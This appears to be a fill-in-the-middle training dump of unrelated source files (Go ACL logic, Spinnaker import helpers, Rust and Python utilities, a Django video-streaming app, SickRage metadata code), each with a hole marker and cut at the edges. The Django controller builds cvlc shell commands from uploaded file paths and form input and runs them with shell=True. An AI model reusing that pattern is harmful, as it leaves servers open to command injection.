repeated // with the next category in the list. Finally, if all categories are ignored, // the process is repeated with just the original set of ACLs. The second // return value is a list of the categories that were ignored. func (c *config) ChooseACLCategoryAction(acls map[string]bool, categories []string, actions ...string) (ar ACLActionRule, ignored []string) { actionsPlus := append(actions, "ignore-category") choices := make(map[string]bool, len(actions)) for _, a := range actions { choices[a] = true } for _, cat := range categories { aclsPlus := copyACLSet(acls) aclsPlus[cat] = true r := c.ACLs.ChooseACLAction(aclsPlus, actionsPlus...) if r.Action == "" { cg := c.Categories[cat] r.Needed = []string{cat} switch cg.action { case BLOCK: if cg.invisible && choices["block-invisible"] { r.Action = "block-invisible" } else if choices["block"] { r.Action = "block" } case IGNORE: r.Action = "ignore-category" case ALLOW: if choices["allow"] { r.Action = "allow" } } } if r.Action == "ignore-category" || r.Action == "" { ignored = append(ignored, cat) } else { return r, ignored } } return c.ACLs.ChooseACLAction(acls, actions...), ignored }<|fim▁end|>
for _, a := range args { switch a[0] {
<|file_name|>import-aliases.js<|end_file_name|><|fim▁begin|>const path = require('path'); const fs = require('fs'); const { flattenDeep, memoize } = require('lodash'); function locateSourceFile(modulesPath, moduleName, importPath = '') { const srcPrefixes = ['src', '']; const indexFiles = ['', 'index']; const extensions = ['.ts', '.tsx', '.js', '.jsx']; const paths = srcPrefixes.map(prefix => extensions.map(extension => indexFiles.map(indexFile => { return path.join(modulesPath, moduleName, prefix, importPath, indexFile) + extension; }), ), ); return flattenDeep(paths).find(p => fs.existsSync(p)); } function _getAllSpinnakerPackages(modulesPath) { const paths = fs.readdirSync(modulesPath); return paths .map(file => path.join(modulesPath, file)) .filter(child => fs.statSync(child).isDirectory()) .map(packagePath => packagePath.split('/').pop()); } const getAllSpinnakerPackages = memoize(_getAllSpinnakerPackages); function makeResult(pkg, importPath) { const subPkg = getSubPackage(pkg, importPath); importPath = importPath || ''; const importPathWithSlash = importPath ? '/' + importPath : ''; return pkg ? { pkg, subPkg, importPath, importPathWithSlash } : undefined; } /** * Given '@spinnaker/amazon', returns { pkg: 'amazon', path: undefined };<|fim▁hole|>function getImportFromNpm(importString) { const regexp = new RegExp(`^@spinnaker/([^/]+)(/.*)?$`); const [, pkg, importPath] = regexp.exec(importString) || []; return makeResult(pkg, importPath); } /** * If code imports from a known spinnaker package alias * Given 'amazon', returns { pkg: 'amazon', path: undefined }; * Given 'core/deep/import', returns { pkg: 'core', path: 'deep/import' }; * Given 'nonspinnakerpackage/deep/import', returns undefined */ function getAliasImport(allSpinnakerPackages, importString) { const [, pkg, importPath] = /^([^/]+)\/(.*)$/.exec(importString) || []; return allSpinnakerPackages.includes(pkg) ? makeResult(pkg, importPath) : undefined; } /** * If code imports from .. relatively, returns the potential alias * Assume all examples are from a file /app/scripts/modules/core/subdir/file.ts * Given '../../amazon/loadbalancers/loadbalancer', returns { pkg: 'amazon', path: 'loadbalancers/loadbalancer' }; * Given '../widgets/button', returns { pkg: 'core', path: 'widgets/button' }; * Given './file2', returns { pkg: 'core', path: 'subdir/file2' }; */ function getRelativeImport(sourceFileName, modulesPath, importString) { if (!importString.startsWith('../')) { return undefined; } const resolvedPath = path.resolve(sourceFileName, importString); const maybeImport = path.relative(modulesPath, resolvedPath); const [pkg, ...rest] = maybeImport.split(path.sep); return pkg ? makeResult(pkg, rest.join('/')) : undefined; } function _getSourceFileDetails(sourceFile) { const [, modulesPath, ownPackage, filePath] = /^(.*app\/scripts\/modules)\/([^/]+)\/(?:src\/)?(.*)$/.exec(sourceFile) || []; const ownSubPackage = getSubPackage(ownPackage, filePath); const sourceDirectory = path.resolve(sourceFile, '..'); return { modulesPath, sourceDirectory, ownPackage, ownSubPackage, filePath }; } function getSubPackage(packageName, filePath) { if (packageName === 'kubernetes') { // subpackage is v1/foo or v2/foo const [, subPkg] = /^((?:v[12]\/)?[^/]+)\/?.*/.exec(filePath) || []; return subPkg; } else { const [, subPkg] = /^([^/]+)\/?.*/.exec(filePath) || []; return subPkg; } } const getSourceFileDetails = memoize(_getSourceFileDetails); module.exports = { getAliasImport, getAllSpinnakerPackages, getImportFromNpm, getRelativeImport, getSourceFileDetails, locateSourceFile, };<|fim▁end|>
* Given '@spinnaker/core/deep/import', returns { pkg: 'core', path: 'deep/import' }; * Given 'anythingelse', returns undefined */
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2013 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms.<|fim▁hole|> //! Networking I/O pub use self::addrinfo::get_host_addresses; pub mod addrinfo; pub mod tcp; pub mod udp; pub mod ip; // FIXME(#12093) - this should not be called unix pub mod unix;<|fim▁end|>
<|file_name|>fixws.py<|end_file_name|><|fim▁begin|>import sys import glob def read_fileb(filename, mode='rb'): f = open(filename, mode) try: return f.read() finally: f.close() def write_fileb(filename, value, mode='wb'): f = open(filename, mode) try: f.write(value) finally: f.close() for filename in glob.glob(sys.argv[1]): data1 = read_fileb(filename) write_fileb(filename + '.bak2', data1)<|fim▁hole|> ).replace('\t', ' ' * 2) for line in data2lines]) + '\n' write_fileb(filename, data2) print filename, len(data1) - len(data2)<|fim▁end|>
data2lines = read_fileb(filename).strip().split('\n') data2 = '\n'.join([line.rstrip(
<|file_name|>export.py<|end_file_name|><|fim▁begin|>from pykintone.base_api import BaseAPI import pykintone.user_api.user_api_result as ur class Export(BaseAPI): def __init__(self, account, requests_options=()): super(Export, self).__init__(account=account, requests_options=requests_options) def get_users(self, ids=(), codes=(), offset=-1, size=0): url = "https://{0}.cybozu.com/v1/users.json".format(self.account.domain) params = {} if len(ids) > 0: params["ids"] = ids if len(codes) > 0: params["codes"] = codes if offset > -1: params["offset"] = offset if size > 0: params["size"] = size resp = self._request("GET", url, params_or_data=params) r = ur.GetUsersResult(resp) return r def get_user_organization_titles(self, code): url = "https://{0}.cybozu.com/v1/user/organizations.json".format(self.account.domain) params = { "code": code } resp = self._request("GET", url, params_or_data=params) r = ur.UserOrganizationTitlesResult(resp) return r def get_user_groups(self, code): url = "https://{0}.cybozu.com/v1/user/groups.json".format(self.account.domain) params = { "code": code } <|fim▁hole|><|fim▁end|>
resp = self._request("GET", url, params_or_data=params) r = ur.GetUserGroupsResult(resp) return r
<|file_name|>normalizer.py<|end_file_name|><|fim▁begin|>#Caleb #normalizes shapes in size and sets the lower left corner to 0 import math def calc_dist(a,b): ax=a[0] ay=a[1] bx=b[0] by=b[1] return math.sqrt((ax-bx)**2+(ay-by)**2) def normalize(shapes): """Normalize shapes >>> normalize([[(0,2.5),(2.5,2.5),(0,0),(2.5,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)]])<|fim▁hole|> right=shapes[0] left=shapes[1] top=shapes[2] back=shapes[3] front=shapes[4] bottom=shapes[5] leftscale=calc_dist(front[0],front[2])/calc_dist(left[1],left[3]) topscale=calc_dist(front[0],front[1])/calc_dist(top[2],top[3]) rightscale=calc_dist(front[1],front[3])/calc_dist(right[0],right[2]) bottomscale=calc_dist(front[2],front[3])/calc_dist(bottom[0],bottom[1]) backscale=bottomscale*calc_dist(bottom[2],bottom[3])/calc_dist(back[0],back[1]) scaleFactors=[rightscale,leftscale,topscale,backscale,1,bottomscale] #scale everything by a factor determined by adjacent sides scaledShapes=[] for shape in enumerate(shapes): scaledShape=[] for point in shape[1]: newpoint=tuple([i * scaleFactors[shape[0]] for i in point]) scaledShape.append(newpoint) scaledShapes.append(scaledShape) #normalize to 0 (sets the bottom left corner to 0,0) shiftedShapes=[] for shape in scaledShapes: x=shape[2][0] y=shape[2][1] newShape=[] for point in shape: newpoint=tuple([point[0]-x,point[1]-y]) newShape.append(newpoint) shiftedShapes.append(newShape) return shiftedShapes if __name__ == "__main__": import doctest doctest.testmod()<|fim▁end|>
[[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)]] """
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>#[macro_use] extern crate serde_derive; extern crate itertools; extern crate clap; use clap::{App, Arg}; mod config; mod subscription; mod util; fn main() { let matches = App::new("podstats") .version("0.2.0") .author("Andrew Michaud <[email protected]") .about("Reads puckfetcher's msgpack cache and provides stats.") .arg( Arg::with_name("config")<|fim▁hole|> .takes_value(true), ) .arg( Arg::with_name("v") .short("v") .multiple(true) .help("Sets the level of verbosity"), ) .get_matches(); println!("Loaded podstats!"); let conf_file = match matches.value_of("config") { Some(c) => Some(c.to_string()), None => None, }; let mut conf = config::Config::new(conf_file); conf.load_cache(); let prompt = util::Prompt {}; let mut menu_options = Vec::new(); menu_options.push("Get names of subscriptions in cache."); menu_options.push("Get entry counts of subscriptions in cache."); menu_options.push("Get sub with highest entry count."); menu_options.push("Get name of sub with highest entry count."); menu_options.push("Get the earliest entry for each sub."); menu_options.push("Get the latest entry for each sub."); loop { let res = prompt.select_from_menu(&menu_options); match res { Some(n) => { println!("{} was provided", n); // TODO provide fns to something to simplify this. match n { 1 => { for (i, item) in conf.get_names().iter().enumerate() { println!("{}: {}", i, item); } } 2 => { for (i, item) in conf.get_entry_counts().iter().enumerate() { println!("{} entry count: {}", i, item); } } 3 => { let item = conf.get_highest_entry_count_sub(); println!("Sub with highest entry count: {}", item); } 4 => { let item = conf.get_highest_entry_count_sub_name(); println!("Name of sub with highest entry count: {}", item); } 5 => { for (i, item) in conf.get_earliest_entry_names().iter().enumerate() { println!("{} earliest entry name: {}", i, item); } } 6 => { for (i, item) in conf.get_latest_entry_names().iter().enumerate() { println!("{} latest entry name: {}", i, item); } } _ => println!("Given invalid option!"), } } None => { println!("Quitting!"); return; } } println!(""); } }<|fim▁end|>
.short("c") .long("config") .value_name("FILE") .help("Sets a custom config file")
<|file_name|>videos.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- __license__ = "GNU Affero General Public License, Ver.3" __author__ = "Pablo Alvarez de Sotomayor Posadillo" # This file is part of Kirinki. # # Kirinki is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # Kirinki is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public # License along with kirinki. If not, see <http://www.gnu.org/licenses/>. # Python general imports import os import os.path import subprocess import httplib from datetime import datetime # Django imports from django import forms from django.http import HttpResponse, HttpResponseRedirect from django.template import RequestContext from django.template.loader import render_to_string # Application imports from kirinki.config import Config from kirinki.common import ErrorClear from kirinki.mainviewer import MainViewer<|fim▁hole|>from kirinki.models import video from kirinki.message import Message from kirinki.user import LoginForm class StreamingController(): '''Class that implements the Streaming controller''' def __init__(self, request): if request.session.get('isConfig', False) is False: Config.getSession(request.session) # Left block leftBlocks = [] if not request.session['user'].is_authenticated(): leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': render_to_string('kirinki/form.html', {'form' : LoginForm(), 'action' : request.session['base_url'] + '/login'}, context_instance=RequestContext(request))})] # Center block centerBlocks = [] try: videoStr = streaming.objects.all() for video in videoStr: centerBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': str(video.idStreaming)})] except streaming.DoesNotExist: pass self.render = MainViewer(request).render(leftBlocks, centerBlocks, []) def getRender(self): '''This method return the html rendered''' return self.render class StrForm(forms.Form): isVideo = forms.BooleanField(label='Emitir Video', required=False) srcIP = forms.IPAddressField(label='Ip de origen', required=False) srcPort = forms.IntegerField(label='Puerto de origen', required=False) srcMux = forms.ChoiceField(label='Multiplexor de origen', choices=[('ogg', 'ogg'), ('ffmpeg{mux=flv}', 'mp4'), ('webm', 'webm')], required=False) vStream = forms.ChoiceField(label='Video a emitir', choices=[], required=True) class StreamController(): '''Class to implement the Stream controller''' def __init__(self, request): if request.session.get('isConfig', False) is False: Config.getSession(request.session) if request.method == 'GET': # GET request form = StrForm(error_class=ErrorClear) form.fields['isVideo'].initial = False form.fields['srcIP'].initial = request.META['REMOTE_ADDR'] form.fields['srcPort'].initial = 9000 form.fields['vStream'].choices = self.userVideos(request) self.render = MainViewer(request).render([], [render_to_string('kirinki/form.html', {'form' : form, 'action' : request.session['base_url'] + '/stream', 'id' : 'stream'}, context_instance=RequestContext(request))], []) elif request.method == 'POST': # POST request form = StrForm(request.POST, error_class=ErrorClear) form.fields['isVideo'].initial = False form.fields['srcIP'].initial = request.META['REMOTE_ADDR'] form.fields['srcPort'].initial = 9000 form.fields['vStream'].choices = self.userVideos(request) # Check if the form data is valid and try to start the streaming if form.is_valid(): try: v = video.objects.filter(idVideo=form.cleaned_data['vStream'])[0] except video.DoesNotExist: v = None if form.cleaned_data['isVideo'] is True and v is not None: clvc = None if v.format == 'video/mp4': cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=ffmpeg{mux=flv},dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True) elif v.format == 'video/webm': cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=webm,dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True) elif v.format == 'video/ogg': cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=ogg,dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True) else: Message.pushMessage(request, Message.ERROR,'Video type not supported') if clvc is not None: vStream = streaming(src=form.cleaned_data['srcIP'], port=form.cleaned_data['srcPort'], mux=form.cleaned_data['srcMux'], vMode=form.cleaned_data['isVideo'], pid=cvlc.pid,video=v, owner=request.session['user']) vStream.save() Message.pushMessage(request, Message.INFO,'Video streaming') elif form.cleaned_data['isVideo'] is False: if form.cleaned_data['srcMux'] != "ffmpeg{mux=flv}" and form.cleaned_data['srcMux'] != "webm" and form.cleaned_data['srcMux'] != "ogg": Message.pushMessage(request, Message.ERROR,'Video type not supported') else: cvlc = subprocess.Popen(["/usr/bin/cvlc http://" + str(form.cleaned_data['srcIP']) + ":" + str(form.cleaned_data['srcPort']) + " --sout '#http{mux=" + str(form.cleaned_data['srcMux']) + ",dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True) vStream = streaming(src=form.cleaned_data['srcIP'], port=form.cleaned_data['srcPort'], mux=form.cleaned_data['srcMux'], vMode=form.cleaned_data['isVideo'], pid=cvlc.pid,video=v, owner=request.session['user']) vStream.save() Message.pushMessage(request, Message.ERROR, 'External video streaming.') else: Message.pushMessage(request, Message.ERROR, 'If you select the video mode you must select a video.') # os.waitpid(p.pid, 0)[1] self.render = HttpResponseRedirect('/streaming') else: for error in form.errors: Message.pushMessage(request, Message.ERROR, 'Error en ' + error + ': ' + str(form._errors[error])) if request.META.get('HTTP_REFERER', False) is not False: self.render = HttpResponseRedirect(request.META['HTTP_REFERER']) else: self.render = HttpResponseRedirect('/index') else: raise Http404 def userVideos(self, request): '''This method return the videos owned by the actual user.''' init = [] try: videos = video.objects.filter(owner=request.session['user']) for v in videos: init.append((v.idVideo, v.name)) except video.DoesNotExist: pass return init def getRender(self): '''This method return the html rendered''' return self.render class VideoController(): '''Class to implement the Video controller''' # Definition of the video actions LIST = 0 VIEW = 1 DELETE = 2 REFERENCE = 3 def __init__(self, request, action=0, key=None): if request.session.get('isConfig', False) is False: Config.getSession(request.session) # Blocks assigned to the left area leftBlocks = [] if not request.session['user'].is_authenticated(): leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': render_to_string('kirinki/form.html', {'form' : LoginForm(), 'action' : request.session['base_url'] + '/login'}, context_instance=RequestContext(request))})] else: try: myVideos = video.objects.filter(owner = request.session['user']) leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'Mis vídeos', 'content' : render_to_string('kirinki/myVideo.html', {'videos' : myVideos, 'session' : request.session}).encode('utf-8')})] except video.DoesNotExist: pass # Blocks assigned to the center area centerBlocks = [] if action == self.LIST: try: videoList = video.objects.all() centerBlocks = [render_to_string('kirinki/section.html', {'title' : 'Lista de videos', 'content': render_to_string('kirinki/videoList.html', {'videos' : videoList, 'session' : request.session}).encode('utf-8')})] except video.DoesNotExist: pass elif action == self.VIEW: if key is not None: try: v = video.objects.get(idVideo=key) bfile = '/media/'+v.path[v.path.rfind('/')+1:v.path.rfind('.')] src = {'orig' : request.session['base_url'] + '/media/'+v.path[v.path.rfind('/')+1:]} if os.path.exists(v.path[:v.path.rfind('.')]+'.ogv'): src['ogv'] = request.session['base_url'] +bfile+'.ogv' if os.path.exists(v.path[:v.path.rfind('.')]+'.webm'): src['webm'] = request.session['base_url'] +bfile+'.webm' if os.path.exists(v.path[:v.path.rfind('.')]+'.mp4'): src['mp4'] = request.session['base_url'] +bfile+'.mp4' if os.path.exists(v.path[:v.path.rfind('.')]+'.flv'): src['flv'] = request.session['base_url'] +bfile+'.flv' src['flash'] = request.session['base_url']+'/static/flowplayer/flowplayer-3.2.5.swf' src['flash_str'] = request.session['base_url']+'/static/flowplayer.pseudostreaming/flowplayer.pseudostreaming-3.2.5.swf' centerBlocks = [render_to_string('kirinki/section.html', {'title' : v.name, 'content': render_to_string('kirinki/video.html', {'controls' : True, 'src' : src})})] except video.DoesNotExist: pass elif action == self.DELETE: try: v = video.objects.get(idVideo=key, owner=request.session['user']) name = v.name os.remove(v.path) v.delete() centerBlocks = ['<p>Video ' + name + ' deleted.</p>'] except video.DoesNotExist: pass elif action == self.REFERENCE: pass else: # Error. Action not defined raise Http404 # Blocks assigned to the right area # Ultimos subidos, ultimos usuarios que han subido, usuarios que mas han subido, ... rightBlocks = [] self.render = MainViewer(request).render(leftBlocks, centerBlocks, rightBlocks) def getRender(self): '''This method returns the html generated''' return self.render class UploadForm(forms.Form): title = forms.CharField(label='Título', min_length=5, max_length=80, required=True) description = forms.CharField(label='Descripción', min_length=5, max_length=250, required=True) fileUpload = forms.FileField(label='Fichero', required=True) convertMP4 = forms.BooleanField(label='Convertir a mp4', required=False) convertOGG = forms.BooleanField(label='Convertir a ogg', required=False) convertWEBM = forms.BooleanField(label='Convertir a webm', required=False) class UploadController(): '''Class to implement the Upload controller. This class will be merged with the VideoController''' def __init__(self, request): if request.session.get('isConfig', False) is False: Config.getSession(request.session) if request.method == 'GET': # GET request leftBlocks = [self.getMyVideos(request.session)] centerBlocks = [self.getUploadVideo(request.session['base_url'], request)] self.render = MainViewer(request).render(leftBlocks, centerBlocks, []) elif request.method == 'POST': # POST request. form = UploadForm(request.POST, request.FILES, error_class=ErrorClear) if form.is_valid(): upFile = request.FILES['fileUpload'] if upFile.size > 0: path = '' if request.session.get('upload_path', False): path = request.session['upload_path']+'/' path += upFile.name destination = open(path, 'wb+') for chunk in upFile.chunks(): destination.write(chunk) destination.close() v = video(name=form.cleaned_data['title'], description=form.cleaned_data['description'], path=path, format=upFile.content_type, pub_date=datetime.now(), owner=request.session['user']) v.save() if form.cleaned_data['convertMP4'] and path[v.path.rfind('.'):].lower() != 'mp4': pass if form.cleaned_data['convertOGG'] and path[v.path.rfind('.'):].lower() != 'ogg': pass if form.cleaned_data['convertWEBM'] and path[v.path.rfind('.'):].lower() != 'web': pass if path[v.path.rfind('.'):].lower() != 'flv': pass else: for error in form.errors: Message.pushMessage(request, Message.ERROR, 'Error en ' + error + ': ' + str(form._errors[error])) if request.META.get('HTTP_REFERER', False) is not False: self.render = HttpResponseRedirect(request.META['HTTP_REFERER']) else: self.render = HttpResponseRedirect('/index') else: raise Http404 def getMyVideos(self, session): '''This method return the videos owned by the actual user.''' content = '' try: myVideos = video.objects.filter(owner = session['user']) content = render_to_string('kirinki/myVideo.html', {'videos' : myVideos, 'session' : session}).encode('utf-8') except video.DoesNotExist: pass return render_to_string('kirinki/section.html', {'title' : 'Mis vídeos', 'content' : content}) def getUploadVideo(self, base_url, request): content = render_to_string('kirinki/form.html', {'form' : UploadForm(request.POST, request.FILES, error_class=ErrorClear), 'action' : base_url + '/upload', 'upload' : True}, context_instance=RequestContext(request)) return render_to_string('kirinki/section.html', {'title' : 'Subir vídeo', 'content' : content}) def getRender(self): '''This method returns the html generated''' return self.render<|fim▁end|>
from kirinki.models import streaming
<|file_name|>DataTypeMapIntFloat.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import sys import hyperdex.client from hyperdex.client import LessEqual, GreaterEqual, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2])) def to_objectset(xs): return set([frozenset(x.items()) for x in xs]) assert c.put('kv', 'k', {}) == True assert c.get('kv', 'k') == {'v': {}}<|fim▁hole|><|fim▁end|>
assert c.put('kv', 'k', {'v': {1: 3.14, 2: 0.25, 3: 1.0}}) == True assert c.get('kv', 'k') == {'v': {1: 3.14, 2: 0.25, 3: 1.0}} assert c.put('kv', 'k', {'v': {}}) == True assert c.get('kv', 'k') == {'v': {}}
<|file_name|>database.rs<|end_file_name|><|fim▁begin|>// Copyright 2018 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Contains configuration structs for the database. use std::path::PathBuf; use serde::{Deserialize, Serialize}; /// Configuration parameters for the Sqlite Database. #[derive(Serialize, Deserialize, Debug, Clone)] #[serde(default)] pub struct DatabaseConfig { /// The path to the SqliteDatabase to use. If set, the parent directory must exist and the /// location must be writable. Saver will never fall back to an in-memory database if this is /// set. #[serde(skip_serializing_if = "Option::is_none")] pub database_path: Option<PathBuf>, /// Sets the cap for the number of scenarios to keep in the database. Set to None for /// unlimited. Defaults to 1,000,000. #[serde(skip_serializing_if = "Option::is_none")] pub max_scenarios_to_keep: Option<u64>, /// How often (in seconds) to prune excess scenarios while running normally. Defaults to every /// 20 minutes (1200 seconds). Regardless of what this is set to, it will always prune on /// shutdown unless max_scenarios_to_keep is unset. pub prune_interval_seconds: u64, } impl Default for DatabaseConfig { fn default() -> Self { DatabaseConfig { database_path: None, max_scenarios_to_keep: Some(1000000), prune_interval_seconds: 1200,<|fim▁hole|><|fim▁end|>
} } }
<|file_name|>bower.js<|end_file_name|><|fim▁begin|>var gulp = require('gulp'), config = require('../config'), mergeStream = require('merge-stream'), mainBowerFiles = require('main-bower-files'), flatten = require('gulp-flatten'), rename = require("gulp-rename"), bowerRequireJS = require('bower-requirejs'), wiredep = require('wiredep').stream; <|fim▁hole|> return gulp.src(config.sass.src) .pipe(wiredep({ exclude: ['jquery'], })) .pipe(gulp.dest(config.sass.srcPath)) }); gulp.task('bower:scripts', function(cb) { var options = { baseURL: config.scripts.srcPath, config: config.scripts.src, exclude: ['jquery'], transitive: true }; bowerRequireJS(options, function (rjsConfigFromBower) { console.info('------> Updated paths config in '+options.config); cb(); }) });<|fim▁end|>
gulp.task('bower:styles', function() {
<|file_name|>mediabrowser.py<|end_file_name|><|fim▁begin|># Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import datetime import os import re import sickbeard import generic from sickbeard import logger, exceptions, helpers from sickbeard import encodingKludge as ek from sickbeard.exceptions import ex import xml.etree.cElementTree as etree class MediaBrowserMetadata(generic.GenericMetadata): """ Metadata generation class for Media Browser 2.x/3.x - Standard Mode. The following file structure is used: show_root/series.xml (show metadata) show_root/folder.jpg (poster) show_root/backdrop.jpg (fanart) show_root/Season ##/folder.jpg (season thumb) show_root/Season ##/filename.ext (*) show_root/Season ##/metadata/filename.xml (episode metadata) show_root/Season ##/metadata/filename.jpg (episode thumb) """ def __init__(self, show_metadata=False, episode_metadata=False, fanart=False, poster=False, banner=False, episode_thumbnails=False, season_posters=False, season_banners=False, season_all_poster=False, season_all_banner=False): generic.GenericMetadata.__init__(self, show_metadata, episode_metadata, fanart, poster, banner, episode_thumbnails, season_posters, season_banners, season_all_poster, season_all_banner) self.name = 'MediaBrowser' self._ep_nfo_extension = 'xml' self._show_metadata_filename = 'series.xml' self.fanart_name = "backdrop.jpg" self.poster_name = "folder.jpg" # web-ui metadata template self.eg_show_metadata = "series.xml" self.eg_episode_metadata = "Season##\\metadata\\<i>filename</i>.xml" self.eg_fanart = "backdrop.jpg" self.eg_poster = "folder.jpg" self.eg_banner = "banner.jpg" self.eg_episode_thumbnails = "Season##\\metadata\\<i>filename</i>.jpg" self.eg_season_posters = "Season##\\folder.jpg" self.eg_season_banners = "Season##\\banner.jpg" self.eg_season_all_poster = "<i>not supported</i>" self.eg_season_all_banner = "<i>not supported</i>" # Override with empty methods for unsupported features def retrieveShowMetadata(self, folder): # while show metadata is generated, it is not supported for our lookup return (None, None, None) def create_season_all_poster(self, show_obj): pass def create_season_all_banner(self, show_obj): pass def get_episode_file_path(self, ep_obj): """ Returns a full show dir/metadata/episode.xml path for MediaBrowser episode metadata files ep_obj: a TVEpisode object to get the path for """ if ek.ek(os.path.isfile, ep_obj.location): xml_file_name = helpers.replaceExtension(ek.ek(os.path.basename, ep_obj.location), self._ep_nfo_extension) metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), 'metadata') xml_file_path = ek.ek(os.path.join, metadata_dir_name, xml_file_name) else: logger.log(u"Episode location doesn't exist: " + str(ep_obj.location), logger.DEBUG) return '' return xml_file_path def get_episode_thumb_path(self, ep_obj): """ Returns a full show dir/metadata/episode.jpg path for MediaBrowser episode thumbs. ep_obj: a TVEpisode object to get the path from """ if ek.ek(os.path.isfile, ep_obj.location): tbn_file_name = helpers.replaceExtension(ek.ek(os.path.basename, ep_obj.location), 'jpg') metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), 'metadata') tbn_file_path = ek.ek(os.path.join, metadata_dir_name, tbn_file_name) else: return None return tbn_file_path def get_season_poster_path(self, show_obj, season): """ Season thumbs for MediaBrowser go in Show Dir/Season X/folder.jpg If no season folder exists, None is returned """ dir_list = [x for x in ek.ek(os.listdir, show_obj.location) if ek.ek(os.path.isdir, ek.ek(os.path.join, show_obj.location, x))] season_dir_regex = '^Season\s+(\d+)$' season_dir = None for cur_dir in dir_list: # MediaBrowser 1.x only supports 'Specials' # MediaBrowser 2.x looks to only support 'Season 0' # MediaBrowser 3.x looks to mimic KODI/Plex support if season == 0 and cur_dir == "Specials": season_dir = cur_dir break match = re.match(season_dir_regex, cur_dir, re.I) if not match: continue cur_season = int(match.group(1)) if cur_season == season: season_dir = cur_dir break if not season_dir: logger.log(u"Unable to find a season dir for season " + str(season), logger.DEBUG) return None logger.log(u"Using " + str(season_dir) + "/folder.jpg as season dir for season " + str(season), logger.DEBUG) return ek.ek(os.path.join, show_obj.location, season_dir, 'folder.jpg') def get_season_banner_path(self, show_obj, season): """ Season thumbs for MediaBrowser go in Show Dir/Season X/banner.jpg If no season folder exists, None is returned """ dir_list = [x for x in ek.ek(os.listdir, show_obj.location) if ek.ek(os.path.isdir, ek.ek(os.path.join, show_obj.location, x))] season_dir_regex = '^Season\s+(\d+)$' season_dir = None for cur_dir in dir_list: # MediaBrowser 1.x only supports 'Specials' # MediaBrowser 2.x looks to only support 'Season 0' # MediaBrowser 3.x looks to mimic KODI/Plex support if season == 0 and cur_dir == "Specials": season_dir = cur_dir break match = re.match(season_dir_regex, cur_dir, re.I) if not match: continue cur_season = int(match.group(1)) if cur_season == season: season_dir = cur_dir break if not season_dir: logger.log(u"Unable to find a season dir for season " + str(season), logger.DEBUG) return None logger.log(u"Using " + str(season_dir) + "/banner.jpg as season dir for season " + str(season), logger.DEBUG) return ek.ek(os.path.join, show_obj.location, season_dir, 'banner.jpg') def _show_data(self, show_obj): """ Creates an elementTree XML structure for a MediaBrowser-style series.xml returns the resulting data object. show_obj: a TVShow instance to create the NFO for """ indexer_lang = show_obj.lang # There's gotta be a better way of doing this but we don't wanna # change the language value elsewhere lINDEXER_API_PARMS = sickbeard.indexerApi(show_obj.indexer).api_params.copy() lINDEXER_API_PARMS['actors'] = True if indexer_lang and not indexer_lang == 'en': lINDEXER_API_PARMS['language'] = indexer_lang if show_obj.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(show_obj.indexer).indexer(**lINDEXER_API_PARMS) tv_node = etree.Element("Series") try: myShow = t[int(show_obj.indexerid)] except sickbeard.indexer_shownotfound: 